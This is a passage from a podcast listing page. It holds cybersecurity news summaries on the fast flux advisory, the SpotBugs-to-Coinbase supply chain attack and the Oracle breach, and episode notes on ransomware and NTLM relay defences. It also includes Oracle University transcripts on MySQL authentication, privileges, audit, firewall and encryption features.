of those funds, watch for official communications and be wary of potential phishing attempts that may exploit the situation.Intelligence Agencies Warn of "Fast Flux" Threat to National Securityhttps://www.cyber.gov.au/about-us/view-all-content/alerts-and-advisories/fast-flux-national-security-threatMultiple intelligence agencies have issued a joint cybersecurity advisory warning organizations about a significant defensive gap in many networks against a technique known as "fast flux." The National Security Agency (NSA), Cybersecurity and Infrastructure Security Agency (CISA), FBI, Australian Signals Directorate, Canadian Centre for Cyber Security, and New Zealand National Cyber Security Centre have collaborated to raise awareness about this growing threat.Fast flux is a domain-based technique that enables malicious actors to rapidly change DNS records associated with a domain, effectively concealing the locations of malicious servers and creating resilient command and control infrastructure. This makes tracking and blocking such malicious activities extremely challenging for cybersecurity professionals."This technique poses a significant threat to national security, enabling malicious cyber actors to consistently evade detection," states the advisory. Threat actors employ two common variants: single flux, where a single domain links to numerous rotating IP addresses, and double flux, which adds an additional layer by frequently changing the DNS name servers responsible for resolving the domain.The advisory highlights several advantages that fast flux networks provide to cybercriminals: increased resilience against takedown attempts, rendering IP blocking ineffective due to rapid address turnover, and providing anonymity that complicates investigations. Beyond command and control communications, fast flux techniques are also deployed in phishing campaigns and to maintain cybercriminal forums and marketplaces.Notably, some bulletproof hosting providers now advertise fast flux as a service differentiator. One such provider boasted on a dark web forum about protecting clients from Spamhaus blocklists through easily enabled fast flux capabilities.The advisory recommends organizations implement a multi-layered defense approach, including leveraging threat intelligence feeds, analyzing DNS query logs for anomalies, reviewing time-to-live values in DNS records, and monitoring for inconsistent geolocation. It also emphasizes the importance of DNS and IP blocking, reputation filtering, enhanced monitoring, and information sharing among cybersecurity communities."Organizations should not assume that their Protective DNS providers block malicious fast flux activity automatically, and should contact their providers to validate coverage of this specific cyber threat," the advisory warns.Intelligence agencies are urging all stakeholders—both government and providers—to collaborate in developing scalable solutions to close this ongoing security gap that enables threat actors to maintain persistent access to compromised systems while evading detection.SpotBugs Token Theft Revealed as Origin of Multi-Stage GitHub Supply Chain Attackhttps://unit42.paloaltonetworks.com/github-actions-supply-chain-attack/Security researchers have traced the sophisticated supply chain attack that targeted Coinbase in March 2025 back to its origin point: the theft of a personal access token (PAT) associated with the popular open-source static analysis tool SpotBugs.Palo Alto Networks Unit 42 revealed in their latest update that while the attack against cryptocurrency exchange Coinbase occurred in March 2025, evidence suggests the malicious activity began as early as November 2024, demonstrating the attackers' patience and methodical approach."The attackers obtained initial access by taking advantage of the GitHub Actions workflow of SpotBugs," Unit 42 explained. This initial compromise allowed the threat actors to move laterally between repositories until gaining access to reviewdog, another open-source project that became a crucial link in the attack chain.Investigators determined that the SpotBugs maintainer was also an active contributor to the reviewdog project. When the attackers stole this maintainer's PAT, they gained the ability to push malicious code to both repositories.The breach sequence began when attackers pushed a malicious GitHub Actions workflow file to the "spotbugs/spotbugs" repository using a disposable account named "jurkaofavak." Even more concerning, this account had been invited to join the repository by one of the project maintainers on March 11, 2025 – suggesting the attackers had already compromised administrative access.Unit 42 revealed the attackers exploited a vulnerability in the repository's CI/CD process. On November 28, 2024, the SpotBugs maintainer modified a workflow in the "spotbugs/sonar-findbugs" repository to use their personal access token while troubleshooting technical difficulties. About a week later, attackers submitted a malicious pull request that exploited a GitHub Actions feature called "pull_request_target," which allows workflows from forks to access secrets like the maintainer's PAT.This compromise initiated what security experts call a "poisoned pipeline execution attack" (PPE). The stolen credentials were later used to compromise the reviewdog project, which in turn affected "tj-actions/changed-files" – a GitHub Action used by numerous organizations including Coinbase.One puzzling aspect of the attack is the three-month delay between the initial token theft and the Coinbase breach. Security researchers speculate the attackers were carefully monitoring high-value targets that depended on the compromised components before launching their attack.The SpotBugs maintainer has since confirmed the stolen PAT was the same token later used to invite the malicious account to the repository. All tokens have now been rotated to prevent further unauthorized access.Security experts remain puzzled by one aspect of the attack: "Having invested months of effort and after achieving so much, why did the attackers print the secrets to logs, and in doing so, also reveal their attack?" Unit 42 researchers noted, suggesting there may be more to this sophisticated operation than currently understood.ASIC Secures Court Orders to Shut Down 95 "Hydra-Like" Scam Companieshttps://asic.gov.au/about-asic/news-centre/find-a-media-release/2025-releases/25-052mr-asic-warns-of-threat-from-hydra-like-scammers-after-obtaining-court-orders-to-shut-down-95-companies/The Australian Securities and Investments Commission (ASIC) has successfully obtained Federal Court orders to wind up 95 companies suspected of involvement in sophisticated online investment and romance baiting scams, commonly known as "pig butchering" schemes.ASIC Deputy Chair Sarah Court warned consumers to remain vigilant when engaging with online investment websites and mobile applications, describing the scam operations as "hydra-like" – when one is shut down, two more emerge in its place."Scammers will use every tool they can think of to steal people's money and personal information," Court said. "ASIC takes action to frustrate their efforts, including by prosecuting those that help facilitate their conduct and taking down over 130 scam websites each week."The Federal Court granted ASIC's application after the regulator discovered most of the companies had been incorporated using false information. Justice Stewart described the case for winding up each company as "overwhelming," citing a justifiable lack of confidence in their conduct and management.ASIC believes many of these companies were established to provide a "veneer of credibility" by purporting to offer genuine services. The regulator has taken steps to remove numerous related websites and applications that allegedly facilitated scam activity by tricking consumers into making investments in fraudulent foreign exchange, digital assets, or commodities trading platforms.In some cases, ASIC suspects the companies were incorporated using stolen identities, highlighting the increasingly sophisticated techniques employed by scammers. These operations often create professional-looking websites and applications designed to lull victims into a false sense of security.The action represents the latest effort in ASIC's ongoing battle against investment scams. The regulator reports removing approximately 130 scam websites weekly, with more than 10,000 sites taken down to date – including 7,227 fake investment platforms, 1,564 phishing scam hyperlinks, and 1,257 cryptocurrency investment scams.Oracle Acknowledges "Legacy Environment" Breach After Weeks of Denialhttps://www.bloomberg.com/news/articles/2025-04-02/oracle-tells-clients-of-second-recent-hack-log-in-data-stolenOracle has finally admitted to select customers that attackers breached a "legacy environment" and stole client credentials, according to a Bloomberg report. The tech giant characterized the compromised data as old information from a platform last used in 2017, suggesting it poses minimal risk.However, this account conflicts with evidence provided by the threat actor from late 2024 and posted records from 2025 on a hacking forum. The attacker, known as "rose87168," listed 6 million data records for sale on BreachForums on March 20, including sample databases, LDAP information, and company lists allegedly stolen from Oracle Cloud's federated SSO login servers.Oracle has reportedly informed customers that cybersecurity firm CrowdStrike and the FBI are investigating the incident. According to cybersecurity firm CybelAngel, Oracle told clients that attackers gained access to the company's Gen 1 servers (Oracle Cloud Classic) as early as January 2025 by exploiting a 2020 Java vulnerability to deploy a web shell and additional malware.The breach, detected in late February, reportedly involved the exfiltration of data from the Oracle Identity Manager database, including user emails, hashed passwords, and usernames.When initially questioned about the leaked data, Oracle firmly stated: "There has been no breach of Oracle Cloud. The published credentials are not for the Oracle Cloud. No Oracle Cloud customers experienced a breach or lost any data." However, cybersecurity expert Kevin Beaumont noted this appears to be "wordplay," explaining that "Oracle rebadged old Oracle Cloud services to be Oracle Classic. Oracle Classic has the security incident." This is a public episode. If you would like to discuss this with other subscribers or get access to bonus episodes, visit edwinkwan.substack.com

Easy Prey
Understanding Ransomware and Defense Strategies

Easy Prey

Play Episode Listen Later Apr 9, 2025 41:20


When it comes to cybersecurity, most people think about firewalls, passwords, and antivirus software. But what about the attackers themselves? Understanding how they operate is just as important as having the right defenses in place. That's where Paul Reid comes in. As the Vice President of Adversary Research at AttackIQ, Paul and his team work to stay one step ahead of cybercriminals by thinking like them and identifying vulnerabilities before they can be exploited.   In this episode, we dive into the world of cyber threats, ransomware, and the business of hacking. Paul shares insights from his 25+ years in cybersecurity, including his experience tracking nation-state attackers, analyzing ransomware-as-a-service, and why cybercrime has become such a highly organized industry. We also talk about what businesses and individuals can do to protect themselves, from understanding threat intelligence to why testing your backups might save you from disaster. Whether you're in cybersecurity or just trying to keep your data safe, this conversation is packed with insights you won't want to miss. Show Notes: [00:58] Paul is the VP of Adversary Research at AttackIQ.  [01:30] His team wants to help their customers be more secure. [01:52] Paul has been in cybersecurity for 25 years. He began working in Novell Networks and then moved to directory services with Novell and Microsoft, Active Directory, LDAP, and more.  [02:32] He also helped design classification systems and then worked for a startup. He also ran a worldwide threat hunting team. Paul has an extensive background in networks and cybersecurity.  [03:49] Paul was drawn to AttackIQ because they do breach attack simulation. [04:22] His original goal was actually to be a banker. Then he went back to his original passion, computer science. [06:05] We learn Paul's story of being a victim of ransomware or a scam. A company he was working for almost fell for a money transfer scam. [09:12] If something seems off, definitely question it. [10:17] Ransomware is an economically driven cybercrime. Attackers try to get in through social engineering, brute force attack, password spraying, or whatever means possible. [11:13] Once they get in, they find whatever is of value and encrypt it or do something else to extort money from you. [12:14] Ransomware as a service (RaaS) has brought ransomware to the masses. [13:49] We discuss some ethics in these criminal organizations. Honest thieves? [16:24] Threats look a lot more real when you see that they have your information. [17:12] Paul shares a phishing scam story with just enough information to make the potential victim click on it.  [18:01] There was a takedown of LockBit in 2020, but they had a resurgence. It's a decentralized ransomware as a service model that allows affiliates to keep on earning, even if the main ones go down. [20:14] Many of the affiliates are smash and grab, the nation states are a little more patient.  [21:11] Attackers are branching out into other areas and increasing their attack service, targeting Linux and macOS. [22:17] The resiliency of the ransomware as a service setup and how they've distributed the risk across multiple affiliates. [23:42] There's an ever growing attack service and things are getting bigger. [25:06] AttackIQ is able to run emulations in a production environment. [26:20] Having the ability to continuously test and find new areas really makes networks more cyber resilient. [29:55] We talk about whether to pay ransoms and how to navigate these situations.  [31:05] The best solution is to do due diligence, updates, patches, and separate backups from the system.  [35:19] Dealing with ransomware is a no win situation. Everyone is different. Thanks for joining us on Easy Prey. Be sure to subscribe to our podcast on iTunes and leave a nice review.  Links and Resources: Podcast Web Page Facebook Page whatismyipaddress.com Easy Prey on Instagram Easy Prey on Twitter Easy Prey on LinkedIn Easy Prey on YouTube Easy Prey on Pinterest Paul Reid - Vice President, Adversary Research AttackIQ Paul Reid on LinkedIn AttackIQ Academy Understanding Ransomware Threat Actors: LockBit

SANS Internet Stormcenter Daily Network/Cyber Security and Information Security Stormcast
SANS Stormcast Feb 12th 2025: MSFT Patch Tuesday; Adobe Patches; FortiNet Acknowledges Exploitation of FortiOS

SANS Internet Stormcenter Daily Network/Cyber Security and Information Security Stormcast

Play Episode Listen Later Feb 12, 2025 5:53


Microsoft Patch Tuesday Microsoft released patches for 55 vulnerabilities. Three of them are actagorized as critical, two are already exploited and another two have been publicly disclosed. The LDAP server vulnerability could become a huge deal, but it is not clear if an exploit will appear. https://isc.sans.edu/diary/Microsoft%20February%202025%20Patch%20Tuesday/31674 Adobe Patches Adobe released patches for seven products. Watch out in particular for the Adobe Commerce issues https://helpx.adobe.com/security/security-bulletin.html Fortinet Acknowledges Exploitation of Vulnerability https://fortiguard.fortinet.com/psirt/FG-IR-24-535

Oracle University Podcast
MySQL Security - Part 2

Oracle University Podcast

Play Episode Listen Later Feb 4, 2025 16:20


Picking up from Part 1, hosts Lois Houston and Nikita Abraham continue their deep dive into MySQL security with MySQL Solution Engineer Ravish Patel. In this episode, they focus on user authentication techniques and tools such as MySQL Enterprise Audit and MySQL Enterprise Firewall.   MySQL 8.4 Essentials: https://mylearn.oracle.com/ou/course/mysql-84-essentials/141332/226362 Oracle University Learning Community: https://education.oracle.com/ou-community LinkedIn: https://www.linkedin.com/showcase/oracle-university/ X: https://x.com/Oracle_Edu   Special thanks to Arijit Ghosh, David Wright, Kris-Ann Nansen, Radhika Banka, and the OU Studio Team for helping us create this episode.   --------------------------------------------------------   Episode Transcript:   00:00 Welcome to the Oracle University Podcast, the first stop on your cloud journey. During this series of informative  podcasts, we'll bring you foundational training on the most popular Oracle technologies. Let's get started! 00:25 Nikita: Welcome to the Oracle University Podcast! I'm Nikita Abraham, Team Lead of Editorial Services with Oracle University, and with me is Lois Houston, Director of Innovation Programs. Lois: Hi everyone! Last week, we began exploring MySQL security, covering regulatory compliance and common security threats.  Nikita: This week, we're continuing the conversation by digging deeper into MySQL's user authentication methods and taking a closer look at some powerful security tools in the MySQL Enterprise suite. 00:57 Lois: And we're joined once again by Ravish Patel, a MySQL Solution Engineer here at Oracle. Welcome, Ravish! How does user authentication work in MySQL? Ravish: MySQL authenticates users by storing account details in a system database. These accounts are authenticated with three elements, username and hostname commonly separated with an @ sign along with a password.  The account identifier has the username and host. The host identifier specifies where the user connects from. It specifies either a DNS hostname or an IP address. You can use a wild card as part of the hostname or IP address if you want to allow this username to connect from a range of hosts. If the host value is just the percent sign wildcard, then that username can connect from any host. Similarly, if you create the user account with an empty host, then the user can connect from any host.  01:55 Lois: Ravish, can MySQL Enterprise Edition integrate with an organization's existing accounts?  Ravish: MySQL Enterprise authentication integrates with existing authentication mechanisms in your infrastructure. This enables centralized account management, policies, and authentication based on group membership and assigned corporate roles, and MySQL supports a wide range of authentication plugins. If your organization uses Linux, you might already be familiar with PAM, also known as Pluggable Authentication Module. This is a standard interface in Linux and can be used to authenticate to MySQL. Kerberos is another widely used standard for granting authorization using a centralized service. The FIDO Alliance, short for Fast Identify Online, promotes an interface for passwordless authentication. This includes methods for authenticating with biometrics RUSB security tokens. And MySQL even supports logging into centralized authentication services that use LDAP, including having a dedicated plugin to connect to Windows domains. 03:05 Nikita: So, once users are authenticated, how does MySQL handle user authorization? Ravish: The MySQL privilege system uses the GRANT keyword. This grants some privilege X on some object Y to some user Z, and optionally gives you permission to grant the same privilege to others. These can be global administrative privileges that enable users to perform tasks at the server level, or they can be database-specific privileges that allow users to modify the structure or data within a database. 03:39 Lois: What about database privileges? Ravish: Database privileges can be fine-grained from the largest to the smallest. At the database level, you can permit users to create, alter, and delete whole databases. The same privileges apply at the table, view, index, and stored procedure levels. And in addition, you can control who can execute stored procedures and whether they do so with their own identity or with the privileges of the procedure's owner. For tables, you can control who can select, insert, update, and delete rows in those tables. You can even specify the column level, who can select, insert, and update data in those columns. Now, any privileged system carries with it the risk that you might forget an important password and lock yourself out. In MySQL, if you forget the password to the root account and don't have any other admin-level accounts, you will not be able to administer the MySQL server. 04:39 Nikita: Is there a way around this? Ravish: There is a way around this as long as you have physical access to the server that runs the MySQL process. If you launch the MySQL process with the --skip grant tables option, then MySQL will not load the privilege tables from the system database when it starts. This is clearly a dangerous thing to do, so MySQL also implicitly disables network access when you use that option to prevent users from connecting over the network. When you use this option, any client connection to MySQL succeeds and has root privileges. This means you should control who has shell access to the server during this time and you should restart the server or enable privileged system with the command flush privileges as soon as you have changed the root password. The privileges we have already discussed are built into MySQL and are always available. MySQL also makes use of dynamic privileges, which are privileges that are enabled at runtime and which can be granted once they are enabled.  In addition, plugins and components can define privileges that relate to features of those plugins. For example, the enterprise firewall plugin defines the firewall admin privilege and the audit admin privilege is defined by the enterprise audit plugin.  06:04 Are you working towards an Oracle Certification this year? Join us at one of our certification prep live events in the Oracle University Learning Community. Get insider tips from seasoned experts and learn from others who have already taken their certifications. Go to community.oracle.com/ou to jump-start your journey towards certification today! 06:28 Nikita: Welcome back! Ravish, I want to move on to MySQL Enterprise security tools. Could you start with MySQL Enterprise Audit? Ravish: MySQL Enterprise Audit is an extension available in Enterprise Edition that makes it easier to comply with regulations that require observability and control over who does what in your database servers. It provides visibility of connections, authentication, and individual operations. This is a necessary part of compliance with various regulations, including GDPR, NIS2, HIPAA, and so on. You can control who has access to the audited events so that the audits themselves are protected. As well as configuring what you audit, you can also configure rotation policies so that unmonitored audit logs don't fill up your storage space. The configuration can be performed while the server is running with minimal effect on production applications. You don't need to restart the server to enable or disable auditing or to change the filtering options. You can output the audit logs in either XML or JSON format, depending on how you want to perform further searching and processing. If you need it, you can compress the logs to save space and you can encrypt the logs to provide address protection of audited identities and data modifications. The extension is available either as a component or if you prefer, as the legacy plugin. 07:53 Lois: But how does it all work? Ravish: Well, first, as a DBA, you'll enable the audit plugin and attach it to your running server. You can then configure filters to audit your connections and queries and record who does what, when they do it, and so on. Then once the system is up and running, it audits whenever a user authenticates, accesses data, or even when they perform schema changes. The logs are recorded in whatever format that you have configured. You can then monitor the audited events at will with MySQL tools such as Workbench or with any software that can view and manipulate XML or JSON files. You can even configure Enterprise Audit to export the logs to an external Audit Vault, enabling collection, and archiving of audit information from all over your enterprise. In general, you won't audit every action on every server. You can configure filters to control what specific information ends up in the logs. 08:50 Nikita: Why is this sort of filtering necessary, Ravish? Ravish: As a DBA, this enables you to create a custom designed audit process to monitor things that you're really interested in. Rules can be general or very fine grained, which enables you to reduce the overall log size, reduces the performance impact on the database server and underlying storage, makes it easier to process the log file once you've gathered data, and filters are configured with the easily used JSON file format. 09:18 Nikita: So what information is audited? Ravish: You can see who did what, when they did it, what commands they use, and whether they succeeded. You can also see where they connected from, which can be useful when identifying man in the middle attacks or stolen credentials. The log also records any available client information, including software versions and information about the operating system and much more. 09:42 Lois: Can you tell us about MySQL Enterprise Firewall, which I understand is a specific tool to learn and protect the SQL statements that MySQL executes? Ravish: MySQL Enterprise Firewall can be enabled on MySQL Enterprise Edition with a plugin. It uses an allow list to set policies for acceptable queries. You can apply this allow list to either specific accounts or groups. Queries are protected in real time. Every query that executes is verified per server and checked to make sure that it conforms to query structures that are defined in the allow list. This makes it very useful to block SQL injection attacks. Only transactions that match well-formed queries in the allow list are permitted. So any attempt to inject other types of SQL statements are blocked. Not only does it block such statements, but it also sends an alert to the MySQL error log in real time. This gives you visibility on any security gaps in your applications. The Enterprise Firewall has a learning mode during which you can train the firewall to identify the correct sort of query. This makes it easy to create the allow list based on a known good workload that you can create during development before your application goes live. 10:59 Lois: Does MySQL Enterprise Firewall operate seamlessly and transparently with applications? Ravish: Your application simply submits queries as normal and the firewall monitors incoming queries with no application changes required. When you use the Enterprise Firewall, you don't need to change your application. It can submit statements as normal to the MySQL server. This adds an extra layer of protection in your applications without requiring any additional application code so that you can protect against malicious SQL injection attacks. This not only applies to your application, but also to any client that configured user runs. 11:37 Nikita: How does this firewall system work?  Ravish: When the application submits a SQL statement, the firewall verifies that the statement is in a form that matches the policy defined in the allow list before it passes to the server for execution.  It blocks any statement that is in a form that's outside of policy.  In many cases, a badly formed query can only be executed if there is some bug in the application's data validation. You can use the firewall's detection and alerting features to let when it blocks such a query, which will help you quickly detect such bugs, even when the firewall continues to block the malicious queries. 12:14 Lois: Can you take us through some of the encryption and masking features available in MySQL Enterprise Edition?  Ravish: Transparent data encryption is a great way to protect against physical security disclosure. If someone gains access to the database files on the file system through a vulnerability of the operating system, or even if you've had a laptop stolen, your data will still be protected. This is called Data at Rest Encryption. It protects not only the data rows in tablespaces, but also other locations that store some version of the data, such as undo logs, redo logs, binary logs and relay logs. It is a strong encryption using the AES 256 algorithm. Once we enable transparent data encryption, it is, of course, transparent to the client software, applications, and users. Applications continue to submit SQL statements, and the encryption and decryptions happen in flight. The application code does not need to change. All data types, table structure, and database names remain the same. It's even transparent to the DBAs. The same data types, table structure, and so on is still how the DBA interacts with the system while creating indexes, views, and procedures. In fact, DBAs don't even need to be in possession of any encryption keys to perform their admin tasks. It is entirely transparent. 13:32 Nikita: What kind of management is required for encryption? Ravish: There is, of course, some key management required at the outside. You must keep the keys safe and put policies in place so that you store and rotate keys effectively, and ensure that you can recover those keys in the event of some disaster. This key management integrates with common standards, including KMIP and KMS. 13:53 Lois: Before we close, I want to ask you about the role of data masking in MySQL. Ravish: Data masking is when we replace some part of the private information with a placeholder. You can mask portions of a string based on the string position using the letter X or some other character. You can also create a table that contains a dictionary of suitable replacement words and use that dictionary to mask values in your data. There are specific functions that work with known formats of data, for example, social security numbers as used in the United States, national insurance numbers from the United Kingdom, and Canadian social insurance numbers. You can also mask various account numbers, such as primary account numbers like credit cards or IBAN numbers as used in the European Bank system. There are also functions to generate random values, which can be useful in test databases. This might be a random number within some range, or an email address, or a compliant credit card number, or social security number. You can also create random information using the dictionary table that contains suitable example values. 14:58 Nikita: Thank you, Ravish, for taking us through MySQL security. We really cannot overstate the importance of this, especially in today's data-driven world.  Lois: That's right, Niki. Cyber threats are increasingly sophisticated these days. You really have to be on your toes when it comes to security. If you're interested in learning more about this, the MySQL 8.4 Essentials course on mylearn.oracle.com is a great next step.  Nikita: We'd also love to hear your thoughts on our podcast so please feel free to share your comments, suggestions, or questions by emailing us at ou-podcast_ww@oracle.com. That's ou-podcast_ww@oracle.com. In our next episode, we'll journey into the world of MySQL backups. Until then, this is Nikita Abraham… Nikita: And Lois Houston, signing off! 15:51 That's all for this episode of the Oracle University Podcast. If you enjoyed listening, please click Subscribe to get all the latest episodes. We'd also love it if you would take a moment to rate and review us on your podcast app. See you again on the next episode of the Oracle University Podcast.

UNSECURITY: Information Security Podcast
Unsecurity Episode 232: Breachmas Recap with Mike "Pinky" Thompson

UNSECURITY: Information Security Podcast

Play Episode Listen Later Jan 10, 2025 37:59


Join us in the new year as FRSecure's Incident Response Manager, Pinky Thompson, joins to recap Breachmas 2024. The group discusses LDAP, recent cyberattack trends, Evil Jinx, and more. Don't forget: The show is available in audio-only form wherever you listen to podcasts! Please send any questions, comments, or feedback to unsecurity@protonmail.com. About FRSecure https://frsecure.com/ FRSecure is a mission-driven information security consultancy headquartered in Minneapolis, MN. Our team of experts is constantly developing solutions and training to assist clients in improving the measurable fundamentals of their information security programs. These fundamentals are lacking in our industry, and while progress is being made, we can't do it alone. Whether you're wondering where to start, or looking for a team of experts to collaborate with you, we are ready to serve.

The BlueHat Podcast
Defending Against NTLM Relay Attacks with Rohit Mothe and George Hughey

The BlueHat Podcast

Play Episode Listen Later Jan 8, 2025 40:08


In this episode of The BlueHat Podcast, hosts Nic Fillingham and Wendy Zenone welcome back George Hughey and Rohit Mothe from the Microsoft Security Response Center (MSRC) to discuss their latest blog post on mitigating NTLM relay attacks by default. George and Rohit explain their roles in vulnerability hunting and delve into NTLM, a 40-year-old authentication protocol, outlining its vulnerabilities and the risks of relay attacks, which function as a type of man-in-the-middle exploit. They highlight Microsoft's move to a "secure by default" approach, ensuring mitigations like channel binding are enabled automatically, providing stronger protections across services like Exchange, Active Directory Certificate Services (ADCS), and LDAP.     In This Episode You Will Learn:     Steps users can take to enhance security in their environments  Why legacy protocols remain a challenge and what the future might hold  The challenges and successes of improving authentication security      Some Questions We Ask:  What is an NTLM relay attack, and how does it work?  Can you explain channel binding and its role in preventing NTLM relay attacks?  What challenges arise from modernizing authentication in complex environments?         Resources:       View George Hughey on LinkedIn   View Rohit Mothe on LinkedIn   View Wendy Zenone on LinkedIn    View Nic Fillingham on LinkedIn      Related Microsoft Podcasts:       Microsoft Threat Intelligence Podcast    Afternoon Cyber Tea with Ann Johnson    Uncovering Hidden Risks          Discover and follow other Microsoft podcasts at microsoft.com/podcasts     

Oracle University Podcast
Introduction to MySQL

Oracle University Podcast

Play Episode Listen Later Jan 7, 2025 26:21


Join hosts Lois Houston and Nikita Abraham as they kick off a new season exploring the world of MySQL 8.4. Together with Perside Foster, a MySQL Principal Solution Engineer, they break down the fundamentals of MySQL, its wide range of applications, and why it's so popular among developers and database administrators. This episode also covers key topics like licensing options, support services, and the various tools, features, and plugins available in MySQL Enterprise Edition.   ------------------------------------------------------------   Episode Transcript:   00:00 Welcome to the Oracle University Podcast, the first stop on your cloud journey. During this series of informative  podcasts, we'll bring you foundational training on the most popular Oracle technologies. Let's get started! 00:26 Lois: Hello and welcome to the Oracle University Podcast! I'm Lois Houston, Director of Innovation Programs with Oracle University, and with me is Nikita Abraham, Team Lead: Editorial Services. Nikita: Happy New Year, everyone! Thank you for joining us as we begin a new season of the podcast, this time focused on the basics of MySQL 8.4. If you're a database administrator or want to become one, this is definitely for you. It's also great for developers working with data-driven apps or IT professionals handling MySQL installs, configurations, and support. 01:03 Lois: That's right, Niki. Throughout the season, we'll be delving into MySQL Enterprise Edition and covering a range of topics, including installation, security, backups, and even MySQL HeatWave on Oracle Cloud.  Nikita: Today, we're going to discuss the Oracle MySQL ecosystem and its various components. We'll start by covering the fundamentals of MySQL and the different licenses that are available. Then, we'll explore the key tools and features to boost data security and performance. Plus, we'll talk a little bit about MySQL HeatWave, which is the cloud version of MySQL.  01:39 Lois: To take us through all of this, we've got Perside Foster with us today. Perside is a MySQL Principal Solution Engineer at Oracle. Hi Perside! For anyone new to MySQL, can you explain what it is and why it's so widely used? Perside: MySQL is a relational database management system that organizes data into structured tables, rows, and columns for efficient programming and data management. MySQL is transactional by nature. When storing and managing data, actions such as selecting, inserting, updating, or deleting are required. MySQL groups these actions into a transaction. The transaction is saved only if every part completes successfully. 02:29 Lois: Now, how does MySQL work under the hood? Perside: MySQL is a high-performance database that uses its default storage engine, known as InnoDB. InnoDB helps MySQL handle complex operations and large data volumes smoothly. 02:49 Nikita: For the unversed, what are some day-to-day applications of MySQL? How is it used in the real world? Perside: MySQL works well with online transaction processing workloads. It handles transactions quickly and manages large volumes of transaction at once. OLTP, with low latency and high throughput, makes MySQL ideal for high-speed environments like banking or online shopping. MySQL not only stores data but also replicates it from a main server to several replicas. 03:31 Nikita: That's impressive! And what are the benefits of using MySQL?  Perside: It improves data availability and load balancing, which is crucial for businesses that need up-to-date information. MySQL replication supports read scale-out by distributing queries across servers, which increases high availability. MySQL is the most popular database on the web. 04:00 Lois: And why is that? What makes it so popular? What sets it apart from the other database management systems? Perside: First, it is a relational database management system that supports SQL. It also works as a document store, enabling the creation of both SQL and NoSQL applications without the need for separate NoSQL databases. Additionally, MySQL offers advanced security features to protect data integrity and privacy. It also uses tablespaces for better disk space management. This gives database administrators total control over their data storage. MySQL is simple, solid in its reliability, and secure by design. It is easy to use and ideal for both beginners and professionals. MySQL is proven at scale by efficiently handling large data volumes and high transaction rates. MySQL is also open source. This means anyone can download and use it for free. Users can modify the MySQL software to meet their needs. However, it is governed by the GNU General Public License, or GPL. GPL outlines specific rules for its use. MySQL offers two major editions. For developers and small teams, the Community Edition is available for free and includes all of the core features needed. For large enterprises, the Commercial Edition provides advanced features, management tools, and dedicated technical support. 05:58 Nikita: Ok. Let's shift focus to licensing. Who is it useful for?  Perside: MySQL licensing is essential for independent software vendors. They're called ISVs. And original manufacturers, they're called OEMs. This is because these companies often incorporate MySQL code into their software products or hardware system to boost the functionality and performance of their product. MySQL licensing is equally important for value-added resellers. We call those VARs. And also, it's important for other distributors. These groups bundle MySQL with other commercially licensed software to sell as part of their product offering. The GPL v.2 license might suit Open Source projects that distribute their products under that license.   07:02 Lois: But what if some independent software vendors, original manufacturers, or value-add resellers don't want to create Open Source products. They don't want their source to be publicly available and they want to keep it private? What happens then? Perside: This is why Oracle provides a commercial licensing option. This license allows businesses to use MySQL in their products without having to disclose their source code as required by GPL v2. 07:33 Nikita: I want to bring up the robust support services that are available for MySQL Enterprise. What can we expect in terms of support, Perside?  Perside: MySQL Enterprise Support provides direct access to the MySQL Support team. This team consists of experienced MySQL developers, who are experts in databases. They understand the issues and challenges their customers face because they, too, have personally tackled these issues and challenges. This support service operates globally and is available in 29 languages. So no matter where customers are located, Oracle Support provides assistance, most likely in their preferred language. MySQL Enterprise Support offers regular updates and hot fixes to ensure that the MySQL customer systems stays current with the latest improvements and security patches. MySQL Support is available 24 hours a day, 7 days a week. This ensures that whenever there is an issue, Oracle Support can provide the needed help without any delay. There are no restrictions on how many times customers can receive help from the team because MySQL Enterprise Support allows for unlimited incidents. MySQL Enterprise Support goes beyond simply fixing issues. It also offers guidance and advice. Whether customers require assistance with performance tuning or troubleshooting, the team is there to support them every step of the way.  09:27 Lois: Perside, can you walk us through the various tools and advanced features that are available within MySQL? Maybe we could start with MySQL Shell. Perside: MySQL Shell is an integrated client tool used for all MySQL database operations and administrative functions. It's a top choice among MySQL users for its versatility and powerful features. MySQL Shell offers multi-language support for JavaScript, Python, and SQL. These naturally scriptable languages make coding flexible and efficient. They also allow developers to use their preferred programming language for everything, from automating database tasks to writing complex queries. MySQL Shell supports both document and relational models. Whether your project needs the flexibility of NoSQL's document-oriented structures or the structured relationships of traditional SQL tables, MySQL Shell manages these different data types without any problems. Another key feature of MySQL Shell is its full access to both development and administrative APIs. This ability makes it easy to automate complex database operations and do custom development directly from MySQL Shell. MySQL Shell excels at DBA operations. It has extensive tools for database configuration, maintenance, and monitoring. These tools not only improve the efficiency of managing databases, but they also reduce the possibility for human error, making MySQL databases more reliable and easier to manage.  11:37 Nikita: What about the MySQL Server tool? I know that it is the core of the MySQL ecosystem and is available in both the community and commercial editions. But how does it enhance the MySQL experience? Perside: It connects with various devices, applications, and third-party tools to enhance its functionality. The server manages both SQL for structured data and NoSQL for schemaless applications. It has many key components. The parser, which interprets SQL commands. Optimizer, which ensures efficient query execution. And then the queue cache and buffer pools. They reduce disk usage and speed up access. InnoDB, the default storage engine, maintains data integrity and supports robust transaction and recovery mechanism. MySQL is designed for scalability and reliability. With features like replication and clustering, it distributes data, manage more users, and ensure consistent uptime. 13:00 Nikita: What role does MySQL Enterprise Edition play in MySQL server's capabilities? Perside: MySQL Enterprise Edition improves MySQL server by adding a suite of commercial extensions. These exclusive tools and services are designed for enterprise-level deployments and challenging environments. These tools and services include secure online backup. It keeps your data safe with efficient backup solutions. Real-time monitoring provides insight into database performance and health. The seamless integration connects easily with existing infrastructure, improving data flow and operations. Then you have the 24/7 expert support. It offers round the clock assistance to optimize and troubleshoot your databases. 14:04 Lois: That's an extensive list of features. Now, can you explain what MySQL Enterprise plugins are? I know they're specialized extensions that boost the capabilities of MySQL server, tools, and services, but I'd love to know a little more about how they work. Perside: Each plugin serves a specific purpose. Firewall plugin protects against SQL injection by allowing only pre-approved queries. The audit plugin logs database activities, tracking who accesses databases and what they do. Encryption plugin secures data at rest, protecting it from unauthorized access. Then we have the authentication plugin, which integrates with systems like LDAP and Active Directory for control access. Finally, the thread pool plugin optimizes performance in high load situation by effectively controlling how many execution threads are used and how long they run. The plugin and tools are included in the MySQL Enterprise Edition suite. 15:32 Join the Oracle University Learning Community and tap into a vibrant network of over 1 million members, including Oracle experts and fellow learners. This dynamic community is the perfect place to grow your skills, connect with likeminded learners, and celebrate your successes. As a MyLearn subscriber, you have access to engage with your fellow learners and participate in activities in the community. Visit community.oracle.com/ou to check things out today! 16:03 Nikita: Welcome back! We've been going through the various 